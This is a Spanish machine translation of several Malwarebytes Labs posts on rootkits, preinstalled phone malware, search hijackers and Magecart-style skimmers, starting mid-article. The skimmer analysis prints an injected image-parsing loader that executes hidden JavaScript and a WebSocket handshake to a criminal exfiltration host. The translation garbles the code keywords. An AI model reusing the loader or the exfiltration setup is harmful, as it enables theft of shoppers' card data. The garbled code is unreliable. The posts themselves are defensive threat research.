Además, los rootkits pueden desactivar el software antimalware y antivirus y dañar gravemente las aplicaciones en modo de usuario. Los atacantes también pueden usar rootkits para espiar el comportamiento del usuario, lanzar ataques DDoS , escalar privilegios y robar datos confidenciales.

Posibles resultados de un ataque de rootkit

Hoy en día, los autores de malware pueden comprar fácilmente rootkits en la web oscura y usarlos en sus ataques. La siguiente lista explora algunas de las posibles consecuencias de un ataque de rootkit.

Datos confidenciales robados

Los rootkits permiten a los piratas informáticos instalar software malicioso adicional que roba información confidencial, como números de tarjetas de crédito, números de seguridad social y contraseñas de usuarios, sin ser detectados.

Infección de malware

Los atacantes usan rootkits para instalar malware en computadoras y sistemas sin ser detectados. Los rootkits ocultan el software malicioso de cualquier anti-malware o antivirus existente, a menudo desactivando el software de seguridad sin el conocimiento del usuario. Como resultado del software antimalware y antivirus desactivado, los rootkits permiten a los atacantes ejecutar archivos dañinos en computadoras infectadas.

Eliminación de archivos

Los rootkits otorgan acceso a todos los archivos y comandos del sistema operativo. Los atacantes que usan rootkits pueden eliminar fácilmente directorios, claves de registro y archivos de Linux o Windows.

Espionaje

Los ciberdelincuentes aprovechan los rootkits para explotar redes no seguras e interceptar información personal del usuario y comunicaciones, como correos electrónicos y mensajes intercambiados por chat.

Control remoto 

Los hackers usan rootkits para acceder de forma remota y cambiar las configuraciones del sistema. Luego, los piratas informáticos pueden cambiar los puertos TCP abiertos dentro de los firewalls o cambiar los scripts de inicio del sistema. 

Tipos de ataques de rootkit

Los atacantes pueden instalar diferentes tipos de rootkit en cualquier sistema. A continuación, encontrará una revisión de los ataques rootkit más comunes.

Rootkits de aplicaciones

Los rootkits de aplicaciones reemplazan archivos legítimos con archivos rootkit infectados en su computadora. Estos rootkits infectan programas estándar como Microsoft Office, Notepad o Paint. Los atacantes pueden obtener acceso a su computadora cada vez que ejecuta esos programas. Los programas antivirus pueden detectarlos fácilmente, ya que ambos operan en la capa de aplicación.

Kits de root del kernel

Los atacantes usan estos rootkits para cambiar la funcionalidad de un sistema operativo insertando código malicioso en él. Esto les da la oportunidad de robar fácilmente información personal.

Rootkits del cargador de arranque

El mecanismo del gestor de arranque es responsable de cargar el sistema operativo en una computadora. Estos rootkits reemplazan el cargador de arranque original con uno infectado. Esto significa que los rootkits del cargador de arranque están activos incluso antes de que el sistema operativo esté completamente cargado.

Rootkits de hardware y firmware

Este tipo de rootkit puede obtener acceso al sistema BIOS de la computadora o a los discos duros, así como a enrutadores, chips de memoria y tarjetas de red.

Rootkits virtualizados

Los rootkits virtualizados aprovechan las máquinas virtuales para controlar los sistemas operativos. Fueron desarrollados por investigadores de seguridad en 2006 como prueba de concepto.

Estos rootkits crean una máquina virtual antes de que se cargue el sistema operativo, y luego simplemente toman el control de su computadora. Los rootkits virtualizados operan a un nivel más alto que los sistemas operativos, lo que los hace casi indetectables.

Cómo prevenir un ataque de rootkit

Los ataques de rootkits son peligrosos y dañinos, pero solo infectan tu computadora si de alguna manera lanzaste el software malicioso que lleva el rootkit. Los consejos a continuación describen los pasos básicos que debe seguir para prevenir la infección de rootkit.

Escanea tus sistemas

Los escáneres son programas de software destinados a analizar un sistema para deshacerse de los rootkits activos.

Los escáneres de rootkits suelen ser eficaces para detectar y eliminar rootkits de aplicaciones. Sin embargo, no son efectivos contra el kernel, el gestor de arranque o los ataques de firmware. Los escáneres a nivel de núcleo solo pueden detectar código malicioso cuando el rootkit está inactivo. Esto significa que debe detener todos los procesos del sistema e iniciar la computadora en modo seguro para escanear el sistema de manera efectiva.

Los expertos en seguridad afirman que un solo escáner no puede garantizar la seguridad completa de un sistema, debido a estas limitaciones. Por lo tanto, muchos aconsejan usar múltiples escáneres y eliminadores de rootkits . Para protegerse completamente contra los ataques de rootkits a nivel de arranque o firmware, debe hacer una copia de seguridad de sus datos y luego reinstalar todo el sistema.

Evitar intentos de phishing

El phishing es un tipo de ataque de ingeniería social en el que los piratas informáticos utilizan el correo electrónico para engañar a los usuarios para que hagan clic en un enlace malicioso o descarguen un archivo adjunto infectado.

El correo electrónico fraudulento puede ser cualquier cosa, desde estafas de príncipes nigerianos que solicitan recuperar oro a mensajes falsos de Facebook solicitando que actualice sus credenciales de inicio de sesión. Los archivos adjuntos infectados pueden ser documentos de Excel o Word, un programa ejecutable normal o una imagen infectada.

Actualiza tu software

Muchos programas de software contienen vulnerabilidades y errores que permiten a los ciberdelincuentes explotarlos, especialmente el software heredado más antiguo. Por lo general, las empresas lanzan actualizaciones periódicas para corregir estos errores y vulnerabilidades. Pero no todas las vulnerabilidades se hacen públicas. Y una vez que el software ha alcanzado cierta edad, las compañías dejan de apoyarlos con actualizaciones.

Las actualizaciones continuas de software son esenciales para mantenerse a salvo y evitar que los piratas informáticos lo infecten con malware. Mantenga todos los programas y su sistema operativo actualizados, y puede evitar los ataques de rootkits que aprovechan las vulnerabilidades.

Use antivirus de última generación

Los autores de malware siempre intentan estar un paso por delante de la industria de la ciberseguridad. Para contrarrestar su progreso, debe usar programas antivirus que aprovechen las técnicas de seguridad modernas, como la detección de anomalías basada en el aprendizaje automático y la heurística del comportamiento. Este tipo de antivirus puede determinar el origen del rootkit en función de su comportamiento, detectar el malware y evitar que infecte su sistema.

Monitoree el tráfico de red

Las técnicas de monitoreo de tráfico de red analizan los paquetes de red para identificar el tráfico de red potencialmente malicioso. El análisis de red también puede mitigar las amenazas más rápidamente al tiempo que aísla los segmentos de red que están bajo ataque para evitar que el ataque se propague.

La prevención del rootkit supera la limpieza

Un rootkit es uno de los tipos de malware más difíciles de encontrar y eliminar. Los atacantes los usan con frecuencia para controlar remotamente su computadora, espiar su comunicación de red o ejecutar ataques de botnet . 

Este es un tipo de malware desagradable que puede afectar seriamente el rendimiento de su computadora y provocar el robo de datos personales. Como es difícil detectar un ataque de rootkit, la prevención suele ser la mejor defensa. Use los consejos ofrecidos en este artículo como punto de partida para su estrategia de defensa. Para garantizar una protección continua, continúe aprendiendo. Los ataques siempre cambian, y es importante mantenerse al día.

La semana pasada en Malwarebytes Labs, les dijimos a los lectores cómo verificar la seguridad de los sitios web y sus archivos relacionados , exploramos el comportamiento sombrío que tiene lugar dentro de la industria de búsqueda de miles de millones de dólares , desglosamos las seis principales formas en que los piratas informáticos se dirigen a las empresas minoristas y ponen un foco en la familia de ransomware Phobos .

También revelamos una nueva historia importante cuando descubrimos que se está enviando un teléfono móvil subsidiado por el gobierno con malware preinstalado e inamovible .  

Otras noticias de ciberseguridad

• Los hackers convencieron a los empleados de telecomunicaciones para que ejecutaran software malicioso en sus máquinas que les permitía a los hackers hacerse cargo de los números de teléfono celular de los clientes. (Fuente: placa base)
• Ring despidió a cuatro empleados que accedieron inapropiadamente a los videos de los clientes. (Fuente: Threatpost)
• Investigadores de ciberseguridad en Google descubrieron un exploit remoto para hackear iPhones . (Fuente: HackRead)
• Un informe de la Society for Information Management encontró que, si bien los ejecutivos de TI son conscientes de las preocupaciones de seguridad cibernética, es posible que no siempre sepan cómo actuar . (Fuente: Lectura oscura)
• Un ataque de ransomware en el Distrito Escolar Unificado de Pittsburg en Pennsylvania condujo a una falta de acceso a Internet para los estudiantes, que se vieron obligados a aprender como lo hicieron «en el día», escribió un maestro. (Fuente: Infosecurity)
• Una compañía de vigilancia secreta que trabaja con las agencias policiales de EE. UU. Comercializó cámaras ocultas incrustadas dentro de lápidas, asientos para bebés y aspiradoras . (Fuente: placa base)
• Una vulnerabilidad TikTok ahora parcheada permitió a los piratas informáticos enviar malware a través de SMS . (Fuente: HackRead)
• Gizmodo compartió los momentos más extraños y peores del Consumer Electronics Show (CES) en Las Vegas. (Fuente: Gizmodo)

Un operador de telefonía móvil financiado por los Estados Unidos que ofrece teléfonos a través del programa Lifeline Assistance está vendiendo un dispositivo móvil preinstalado con no una, sino dos aplicaciones maliciosas. Assurance Wireless de Virgin Mobile ofrece el teléfono UMX U686CL como su opción más económica. Con solo $ 35 bajo el programa financiado por el gobierno, es una oferta atractiva. Sin embargo, lo que viene instalado es espantoso.

No solo malicioso, sino preinstalado

En octubre de 2019, vimos varias quejas en nuestro sistema de soporte de usuarios con un teléfono emitido por el gobierno que informaba que algunas de sus aplicaciones preinstaladas eran maliciosas. Compramos un UMX U686CL para ayudar mejor a nuestros clientes y verificar sus reclamos.

Informamos a Assurance Wireless de nuestros hallazgos y les preguntamos en blanco por qué un proveedor de servicios móviles financiado por los Estados Unidos está vendiendo un dispositivo móvil infectado con malware preinstalado. Después de darles el tiempo adecuado para responder, desafortunadamente nunca tuvimos respuesta. Esto es lo que descubrimos.

La primera aplicación cuestionable que se encuentra en el UMX U686CL se presenta como un actualizador llamado Actualización inalámbrica. Sí, es capaz de actualizar el dispositivo móvil. De hecho, es la única forma de actualizar el sistema operativo (SO) del dispositivo móvil. Por el contrario, también es capaz de instalar aplicaciones automáticamente sin el consentimiento del usuario.

Por lo tanto, detectamos esta aplicación como Android / PUP.Riskware.Autoins.Fota.fbcvd , un nombre de detección que debería ser familiar para Malwarebytes para los clientes de Android. Esto se debe a que la aplicación es en realidad una variante de Adups , una compañía con sede en China que fue atrapada recolectando datos de usuarios, creando puertas traseras para dispositivos móviles y, sí, desarrollando instaladores automáticos.

Desde el momento en que inicia sesión en el dispositivo móvil, Wireless Update inicia la instalación automática de aplicaciones. Para repetir: no se ha obtenido el consentimiento del usuario para hacerlo, no hay botones para hacer clic para aceptar las instalaciones, solo instala las aplicaciones por sí mismo. Si bien las aplicaciones que instala están inicialmente limpias y libres de malware, es importante tener en cuenta que estas aplicaciones se agregan al dispositivo con cero notificaciones o permisos requeridos por el usuario. Esto abre la posibilidad de que el malware se instale sin saberlo en una actualización futura de cualquiera de las aplicaciones agregadas por Wireless Update en cualquier momento. 

No solo preinstalado, sino inamovible

Con gran frustración debo escribir sobre otra aplicación maliciosa preinstalada inamovible que se encuentra en el teléfono UMX U686CL: la propia aplicación de configuración del dispositivo móvil funciona como un malware muy ofuscado que detectamos como Android / Trojan.Dropper.Agent.UMX . Debido a que la aplicación sirve como el tablero desde el cual se cambia la configuración, eliminarla dejaría el dispositivo inutilizable.

Android / Trojan.Dropper.Agent.UMX comparte características con otras dos variantes de cuentagotas de troyanos móviles conocidos. La primera característica es que usa los mismos nombres de receptor y servicio. El nombre del receptor termina con ALReceiver y el nombre del servicio termina con ALAJobService. Estos nombres solos son demasiado genéricos para hacer una correlación sólida. Pero, junto con el hecho de que el código es casi idéntico, y podemos confirmar con confianza una coincidencia. 

La única diferencia entre los dos códigos son sus nombres de variables. La variante más perceptible de este malware utiliza caracteres chinos para nombres de variables. Por lo tanto, podemos suponer que el origen de este malware es China.

La segunda característica que comparte es que contiene una cadena codificada dentro del código. La decodificación de esta cadena revela un archivo de biblioteca oculto llamado com.android.google.bridge.LibImp.

Tomemos un tiempo para ver cómo fluye el código mientras decodifica com.android.google.bridge.LibImp . Primero toma la cadena codificada y decodifica usando la decodificación Base64.

Luego carga la biblioteca decodificada en la memoria usando DexClassLoader .

Una vez que la biblioteca se carga en la memoria, suelta otra pieza de malware conocida como Android / Trojan.HiddenAds .

Aunque todavía tenemos que reproducir la caída de malware adicional, nuestros usuarios han informado que, de hecho, una variante de HiddenAds se instala repentinamente en su dispositivo móvil UMX.

El origen del malware

Además de que el malware es de origen chino, cabe mencionar que este dispositivo móvil UMX también está hecho por una empresa china. Esto podría ser simplemente una coincidencia en lugar de un descontento explícito: no podemos confirmar si los fabricantes del dispositivo saben que hay malware chino preinstalado.

Sin resolución actual

Aunque tenemos una manera de desinstalar aplicaciones preinstaladas para los usuarios actuales de Malwarebytes , hacerlo en el UMX tiene consecuencias. Desinstale la Actualización inalámbrica y podría perderse actualizaciones críticas para el sistema operativo. Creemos que vale la pena el compromiso, y sugerimos hacerlo. 

Pero desinstale la aplicación de Configuración , y acaba de hacerse un peso de papel caro. Ofrecemos un intento de remediar dicho malware preinstalado en nuestro blog: El nuevo panorama del malware móvil preinstalado: código malicioso dentro . Ver sección: Intentando remediar.

El malware preinstalado empeora, como se anunció

Como he destacado en este blog y blogs anteriores, el malware preinstalado sigue siendo un flagelo para los usuarios de dispositivos móviles. Pero ahora que hay un dispositivo móvil disponible para su compra a través de un programa financiado por el gobierno de los EE. UU., Esto en adelante eleva (o reduce, como quiera que lo vea) el obstáculo sobre el mal comportamiento de las empresas de desarrollo de aplicaciones.

Budget no debe dictar si un usuario puede permanecer seguro en su dispositivo móvil. Descarta miles por un iPhone y escapa de la malicia preinstalada. ¿Pero utiliza fondos con ayuda del gobierno para comprar un dispositivo y pagar el precio en malware? Ese no es el tipo de existencia libre de malware que imaginamos en Malwarebytes.

Palabras finales sobre UMX U686CL

Con un UMX U686CL real en mis manos, puedo decirte que no es un teléfono malo. Se siente sólido en la mano y funciona sin problemas. Claro, no es el dispositivo móvil más rápido, pero es un teléfono inteligente totalmente capaz. En general, sin el malware, este dispositivo es una buena opción para cualquier persona con un presupuesto. 

Es importante darse cuenta de que UMX no está solo. Hay muchos informes de fabricantes de presupuesto que vienen preinstalados con malware, y estos informes están aumentando en número. Aunque no tengo la respuesta a este problema generalizado, puedo decir que los ciudadanos estadounidenses que usan el Programa de Asistencia Lifeline y muchos otros con un presupuesto ajustado merecen más.

Los motores de búsqueda ganan dinero mostrando a los usuarios anuncios patrocinados: mucho dinero. Esto atrae la atención, la competencia y muchos que quieren una parte de la acción sin hacer el trabajo real o sin considerar el impacto para aquellos en el otro extremo de la barra de búsqueda. Porque en el negocio de búsqueda, incluso las migas son interesantes.

En esta publicación, analizamos las formas en que los anunciantes turbios, los ciberdelincuentes y otros buitres intentan desviar las ganancias del negocio de los motores de búsqueda utilizando tácticas tecnológicas engañosas que finalmente perjudican a los usuarios más que a los propios motores de búsqueda.

¿Cómo ganan dinero los motores de búsqueda exactamente?

Cada vez que alguien hace clic en un anuncio patrocinado, el motor de búsqueda requerido gana dinero en función de pago por clic. Son pagados por los anunciantes, que desembolsan una ubicación beneficiosa en los resultados de búsqueda de las palabras clave de su elección.

Como resultado de la popularidad de estos motores de búsqueda, en particular Google, las empresas estadounidenses gastan aproximadamente $ 80 mil millones en optimización de motores de búsqueda (SEO) solamente. Y los principales motores de búsqueda son propiedad de algunas de las empresas de tecnología más valiosas.

Motor de búsqueda predeterminado

Saber esto puede hacer que sea más fácil entender por qué los secuestradores de navegador están tan interesados ​​en cambiar el motor de búsqueda predeterminado en su navegador favorito. Obtienen un pedazo del pastel para referencias, y esto los incita a usar varios métodos para que sus búsquedas se ejecuten entre sus manos. Si un secuestrador logra cambiar su motor de búsqueda predeterminado por el suyo, puede beneficiarse de sus búsquedas.

Pero hay otras formas rentables de interferir con los resultados de búsqueda:

• Las nuevas pestañas son secuestradores del navegador que abren una nueva pestaña con un sitio o página establecida por el secuestrador. Estas páginas generalmente contienen una barra de búsqueda. El objetivo es lograr que el usuario ingrese sus consultas en ese formulario de búsqueda en lugar de buscar desde la barra de direcciones, que aún apuntaría al motor de búsqueda predeterminado.
• Los secuestradores de la página de inicio cambian la página de inicio del navegador afectado por las mismas razones que las pestañas nuevas, solo en diferentes navegadores.
• Los secuestradores de páginas de búsqueda son en su mayoría extensiones de navegador que pueden leer y cambiar los datos en varios sitios web. En estos casos, los sitios web son los principales motores de búsqueda. Los secuestradores de búsqueda vienen en algunos sabores principales:
  • Los redireccionamientos de los principales motores de búsqueda se ven obligados a un sitio propiedad del secuestrador. A veces, los resultados se mostrarán allí, pero a veces se le devuelve con solo una referencia agregada a su consulta. Las referencias son lo que paga a los secuestradores.
  • Los resultados patrocinados se agregan a los resultados recuperados por los principales motores de búsqueda y, a veces, se presentan como si estuviera utilizando un motor de búsqueda completamente nuevo. En otras ocasiones, los cambios son tan mínimos que nunca se notará.
  • Los resultados patrocinados se agregan a los resultados de los principales motores de búsqueda y se presentan como si fueran los resultados originales.
  • Las búsquedas redirigidas ocurren desde un motor de búsqueda principal a otro motor de búsqueda. El secuestrador alimenta su consulta a otro motor y agrega su referencia sobre la marcha.

Cada uno de los métodos anteriores está en uso por las principales familias de programas potencialmente no deseados (PUP) y adware . Si bien ninguna de estas categorías de amenazas se considera malware, inhiben la capacidad de los usuarios de ver resultados de búsqueda limpios y originales utilizando el motor de su elección, lo que finalmente interfiere en su experiencia en línea.

Métodos más invasivos para beneficiarse de los resultados de búsqueda

Al ver el potencial de ganancias inesperadas, los PUP y el adware han encontrado otras formas más invasivas de ganar dinero con sus búsquedas, métodos que interfieren con los resultados mostrados. Éstos incluyen:

• Cambiadores de resultados de búsqueda que brindan a los sitios de pago una mejor posición sin revelar que se les paga.
• SEO pois o Ning que adquiere artificialmente un mejor rango de página.
• Fraude publicitario , que engaña a los anunciantes haciéndoles creer que han mostrado su anuncio en las máquinas afectadas, mientras que el usuario de dicha máquina puede no haber notado nada en absoluto.

El rango de página describe qué tan alto en los resultados de búsqueda aparece su entrada. Cuanto más alto, mejor es el consenso general, pero seguramente querrás estar en la primera página. Si las personas detectan un resultado de búsqueda que probablemente cumpla su búsqueda de conocimiento en la primera página de resultados, generalmente hacen clic en ese enlace antes de molestarse en mirar las otras páginas de resultados. Se sabe que muchos siguen el primer enlace debajo de los resultados patrocinados.

¿Cómo se logra un buen rango de página? Los motores de búsqueda utilizan muchos algoritmos diferentes para decidir el orden en que se muestran los resultados, pero uno de los criterios principales es tener muchos enlaces entrantes a la página web, con el entendimiento de que los enlaces de sitios acreditados tienen un mayor peso.

El envenenamiento de SEO es difícil de hacer en los principales motores de búsqueda: han visto todos los trucos del libro y están atentos a prohibir esas tácticas lo más rápido posible. Entonces, si abusa de la posición de ser marcado como un sitio de buena reputación, puede perderlo mucho más rápido de lo que lo ganó. Solo generará efectos a corto plazo, lo que funciona para aquellos que buscan dinero rápido, pero no para negocios a largo plazo.

Extensiones de privacidad falsas

Hay muchas formas de realizar cambios en los motores de búsqueda y en los resultados de búsqueda en un sistema afectado con PUP o adware, pero el método más popular es seducir a las víctimas para que instalen una extensión del navegador que promete algún tipo de funcionalidad.

Es típico ver secuestradores de búsqueda que prometen proteger su privacidad en línea o actuar como un bloqueador de anuncios , ya que ambos complementos requieren que los usuarios les otorguen permiso para ver o tener control sobre una amplia gama de datos y configuraciones de computadora. Debido a esto, es importante que los usuarios examinen exhaustivamente las posibles extensiones de privacidad y bloqueadores de anuncios antes de descargar.

Secuestradores de ejemplo

Permítanos mostrarle algunos ejemplos de los diferentes secuestradores de búsqueda y los permisos que necesitan para realizar su trabajo sucio. Usaré las solicitudes de permisos solo para las extensiones de Chrome, pero la mayoría de estos secuestradores también existen en el ámbito de Firefox.

Ejemplo 1 : cambio de búsqueda predeterminada

Se cambiará la configuración de búsqueda predeterminada, que es una bandera roja. Este tipo de extensión generalmente le promete alguna funcionalidad que explica la necesidad de dicho permiso.

Ejemplo 2 : cambio de resultados

Cambiar sus datos en este caso significa que alterarán los resultados de búsqueda de los tres motores de búsqueda principales: Bing, Google y Yahoo. El cuarto listado es para el origen de esta extensión.

Ejemplo 3 : Agregar una barra de búsqueda en la nueva pestaña:

La página que se muestra cuando abre una nueva pestaña contendrá un formulario de búsqueda que conduce al sitio de búsqueda que pertenece a la extensión.

Ejemplo 4 : el fregadero de la cocina

Esta extensión cambia la pestaña nueva y la búsqueda predeterminada; un ataque de múltiples vectores, por así decirlo. También requiere otros permisos, como leer el historial de navegación y administrar descargas, de los que me alejaría por razones de privacidad.

Ejemplo 5 : Agregar resultados patrocinados a sus resultados de Google:

Este obtiene los resultados de Google y luego agrega un pequeño encabezado y un montón de resultados patrocinados.

Los ladrones de motores de búsqueda son difíciles de encontrar

Vemos muchas quejas de personas que se preguntan qué causó el cambio de su experiencia de búsqueda y cómo. La mayoría de las veces, se debe a una extensión como los ejemplos mostrados anteriormente. Muchas personas no se dan cuenta de que las extensiones son las culpables porque se instalaron por una razón diferente, a veces incluso de una fuente confiable o como parte de un paquete, a veces pretendiendo no instalarlas . Pero leer entre líneas de letra pequeña en esas solicitudes de permiso, o simplemente leerlas, puede darle una idea de cómo su motor de búsqueda y la experiencia del navegador se enredaron en PUP y adware.

Esperamos que esta publicación (y un escaneo de un programa antivirus de buena reputación como Malwarebytes o Browser Guard ) ayude a resolver esos problemas en el futuro.

Durante varios años, los delincuentes han podido robar datos de tarjetas de crédito de compradores en línea sin darse cuenta sin llamar demasiado la atención. Pocas personas en la industria de la seguridad estaban hablando de estos skimmers web de tarjetas de crédito, tanto del lado del servidor como del lado del cliente, antes de que este último se conociera en gran medida como Magecart .

Se necesitaron algunos incidentes importantes, en particular las infracciones de Ticketmaster y British Airways , para poner esta creciente amenaza bajo el foco de atención y finalmente crear conciencia entre los comerciantes y consumidores en línea.

Bajo la presión de un mayor escrutinio, en particular por parte de varios investigadores de seguridad, algunos actores de amenazas comenzaron a desarrollar su habilidad. Esta es una reacción natural, no limitada a los skimmers web, sino que se aplica a cualquier empresa maliciosa, cibernética o no.

Una de estas evoluciones recientes incluye dos nuevas técnicas de evasión adaptadas para los skimmers web del lado del cliente utilizados para ocultar su actividad fraudulenta.

Esteganografía: una imagen que vale más que mil secretos

Los autores de malware han utilizado la esteganografía durante mucho tiempo como una forma de ocultar datos dentro de imágenes de aspecto legítimo. En 2014, describimos una nueva variante del troyano bancario Zeus llamado ZeusVM , que ocultaba sus datos de configuración dentro de una imagen de una hermosa puesta de sol.

En el contexto de la seguridad del sitio web, ocultar código malicioso en archivos de imagen es una excelente manera de pasar desapercibido. Tomemos, por ejemplo, un sitio web de comercio electrónico y los diversos componentes que carga, muchos de ellos serán logotipos, imágenes de productos, etc.

El 26 de diciembre, @AffableKraut reveló el primer skimmer de tarjetas de crédito basado en esteganografía documentado públicamente. A simple vista, la imagen se ve como una cinta típica de envío gratuito que comúnmente se ve en los sitios de compras.

La única indicación de que puede haber algo mal es el hecho de que el archivo está mal formado, con datos adicionales encontrados después del final normal del archivo.

Para comprender mejor qué y dónde podrían estar estos datos, podemos mirar la imagen en un editor hexadecimal. El formato de intercambio de archivos ( JFIF ) para la codificación JPEG tiene una estructura específica. Utilizamos el diagrama de Ange Albertini como guía.

Hasta ahora, la imagen cumple con sus requisitos, y no parece tener nada de especial. Sin embargo, si recordamos lo que vimos en la Figura 1, se agregaron datos adicionales después del segmento final, que tiene el marcador FF D9.

Ahora podemos ver el código JavaScript que comienza inmediatamente después del final del marcador de archivo. Mirando algunas de sus cadenas, como onestepcheckout o authorizenet , podemos deducir de inmediato que este es el código de skimming de la tarjeta de crédito.

Todos los sitios comprometidos que encontramos utilizando un skimmer esteganográfico fueron inyectados con fragmentos de código similares (generalmente después del elemento de pie de página o el Administrador de etiquetas de Google) para cargar la imagen falsa y analizar su contenido de JavaScript a través del método slice () .

var xhr = new XMLHttpRequest (); 
xhr.open ('GET', '[ruta de imagen]', verdadero); 
xhr.send (); 
xhr.onreadystatechange = function () { 
     if (this.readyState! = 4) return; 
     if (this.status == 200) { 
         var F = nueva función (this.responseText.slice (- [número])); 
         retorno (F ()); 
     } 
}

Como sucede, la mayoría de los rastreadores y escáneres web se concentrarán en archivos HTML y JavaScript, y a menudo ignorarán los archivos multimedia, que tienden a ser grandes y ralentizan el procesamiento. ¿Qué mejor lugar para colarse en algún código?

Hace varios años, hubo grandes campañas de publicidad maliciosa que redirigieron a las víctimas al kit de explotación Angler, uno de los kits de herramientas más avanzados que se utiliza para infectar a los usuarios con malware. Un actor de amenazas usó una técnica similar al ocultar el código de huellas digitales dentro de una imagen GIF falsa . En ese momento, esta era la crème de la crème de las técnicas de publicidad maliciosa.

En cierto sentido, cualquier archivo cargado directamente o de un tercero debe considerarse sospechoso. @AffableKraut se vincula a un sistema de escaneo de archivos de código abierto llamado Strelka que puede ser útil para los defensores en la detección de archivos anómalos.

WebSockets en lugar de HTTP

WebSocket es un protocolo de comunicación que permite intercambiar flujos de datos entre un cliente y un servidor a través de una única conexión TCP. Por lo tanto, los WebSockets son diferentes al protocolo HTTP más comúnmente conocido, que consiste en solicitudes y respuestas a un servidor desde un cliente.

Si bien los WebSockets son ventajosos para la transferencia de datos en tiempo real, esta no es la razón por la cual los actores de amenazas pueden estar interesados ​​en ellos. Para su caso de uso particular, WebSockets proporciona una forma más encubierta de intercambiar datos que las solicitudes-respuestas HTTP típicas.

Con los skimmers web, hay ciertos artefactos que buscamos:

• Código de skimmer inyectado directamente en un sitio comprometido (JavaScript en el DOM)
• Código de skimmer cargado desde recursos externos (etiqueta de script con atributo src)
• Exfiltración de los datos robados (solicitudes HTTP GET o HTTP POST con datos codificados)

Sin embargo, WebSockets ofrece otra forma de intercambiar datos, como lo encontró @AffableKraut . El primer componente es el código de descremado en sí, seguido de la exfiltración de datos.

Los atacantes necesitan cargar un nuevo WebSocket y eso se puede detectar en el DOM. Sin embargo, fueron inteligentes para ofuscar el código lo suficientemente bien como para que se mezcle por completo.

El objetivo es ocultar una conexión a un servidor controlado por los delincuentes a través de un WebSocket. Una vez que este código JavaScript se ejecuta en el navegador, activará la siguiente solicitud de protocolo de enlace de cliente:

OBTENGA https://tawktalk.com/modernize/css/ HTTP / 1.1 
Host: tawktalk.com 
Conexión: Actualización 
Pragma: sin caché 
Control de caché: sin caché 
Agente de usuario: {eliminado} 
Actualización: websocket 
Origen: https: //www.{removed}.com 
Sec-WebSocket-Version: 13 
Accept-Encoding: gzip, deflate, br 
Accept-Language: en-US, en; q = 0.9 
Sec-WebSocket-Key: {eliminado} 
Sec-WebSocket -Extensiones: permessage-deflate; client_max_window_bits

Seguirá la respuesta de protocolo de enlace del servidor:

HTTP / 1.1 101 Protocolos de conmutación 
Servidor: nginx / 1.12.2 
Fecha: {eliminado} 
Conexión: actualización 
Actualización: websocket 
Sec-WebSocket-Accept: {eliminado} 
EndTime: {eliminado} 
ReceivedBytes: 22296 
SentBytes: 57928

Una vez establecido esto, se intercambiará una serie de mensajes bidireccionales entre el cliente (navegador de la víctima) y el servidor (host malicioso). Una propagación codificada Base64 más grande se descarga en el cliente y se procesa como código JavaScript. Esto resulta ser el código de skimming de la tarjeta de crédito.

Los siguientes mensajes más pequeños son intentos de exfiltración de campos de formulario presentes en la página de pago. Los datos se han cifrado para que sea menos obvio. Podemos ver que hay duplicados, al igual que lo que encontramos con algunos skimmers tradicionales que desencadenan la exfiltración en función de un evento de temporizador repetido.

WebSockets también fueron utilizados por otra amenaza web, que en ese momento estaba en los titulares casi a diario: cryptojacking . En este caso, no fue tanto por la ocultación sino por la eficiencia, ya que el proceso de minería en el navegador tuvo que enviar hashes al servidor para cada nuevo trabajo de minería. Sin embargo, notamos el uso de WebSockets junto con servidores proxy para evadir la detección.

Diferentes trucos, misma protección.

Las técnicas descritas en este blog sin duda causarán dolores de cabeza a los defensores y darán a algunos actores de la amenaza tiempo adicional para continuar sus actividades sin ser molestados. Pero como se mencionó anteriormente, este tipo de juego de gato y ratón era de esperar a la luz de nuevas publicaciones regulares sobre Magecart y skimmers web.

Hay otras formas de ocultar y cargar scripts maliciosos. Aunque la tecnología se está retirando, Flash Player a través de ActionScript también fue un gran vehículo para muchas campañas de malware. Por ejemplo, una famosa infraestructura de redirección llamada EITest solía tener un archivo SWF que cargaba un iframe malicioso en un kit de explotación.

Si bien la mayoría de los autores de malware seguirán utilizando métodos tradicionales, los actores más avanzados encontrarán nuevas formas de evadir la detección. Algunas técnicas pueden estar dirigidas a los investigadores, mientras que otras pueden estar destinadas a evitar los rastreadores web.

En Malwarebytes, continuamos monitoreando el cambio en este panorama de amenazas para mantener a nuestros usuarios seguros. La protección contra skimmers web está disponible a través de nuestro software Malwarebytes .

La semana pasada en Malwarebytes Labs, continuamos nuestra cobertura retrospectiva con un vistazo a cómo los legisladores en los Estados Unidos trataron la privacidad en línea este año, encontrando tendencias en múltiples proyectos de ley federales presentados en el Senado . Luego tomamos un pequeño descanso para las vacaciones.

Otras noticias de ciberseguridad:

• Ahora una tradición anual durante casi una década, SplashData dio a conocer las contraseñas más populares de este año , con «123456» y «123456789» ocupando los dos primeros lugares. Los favoritos de los fanáticos «contraseña1» y «admin» y «qwerty» también ocuparon un lugar alto, con los candidatos de caballos oscuros «princesa» y «dragón» también en la lista. (Fuente: HackRead)
• Según los informes, la popular aplicación de mensajería de chat ToTok funciona como una herramienta de espionaje profundamente invasiva operada por el gobierno de los Emiratos Árabes Unidos. (Fuente: New York Times)
• El «optimista jefe de operaciones» en 1Password proporcionó una mirada divertida a la seguridad de la contraseña al compararla con las lecciones aprendidas en «A Christmas Carol» de Charles Dickens (Fuente: Dark Reading)
• La Guardia Costera de los Estados Unidos reveló que la red de TI para una instalación de la Ley de Seguridad del Transporte Marítimo se cerró después de un ataque de ransomware Ryuk . (Fuente: Bleeping Computer)
• Los investigadores de seguridad cibernética advirtieron a las personas sobre cinco vulnerabilidades ahora parcheadas en el navegador Google Chrome que podrían haber permitido a los actores de amenazas ejecutar código de forma remota . (Fuente: Threatpost)
• Un proveedor de servicios de salud mental de San Antonio y un hospital de Nuevo México sufrieron ataques de malware inmediatamente antes de las vacaciones en Estados Unidos . (Fuente: Bleeping Computer)
• Una pareja de Carolina del Norte dio un suspiro de alivio al enterarse de que los ruidos que bajaban en el medio de la noche no fueron causados ​​por un intruso, sino por … su Roomba . (Fuente: Ars Technica)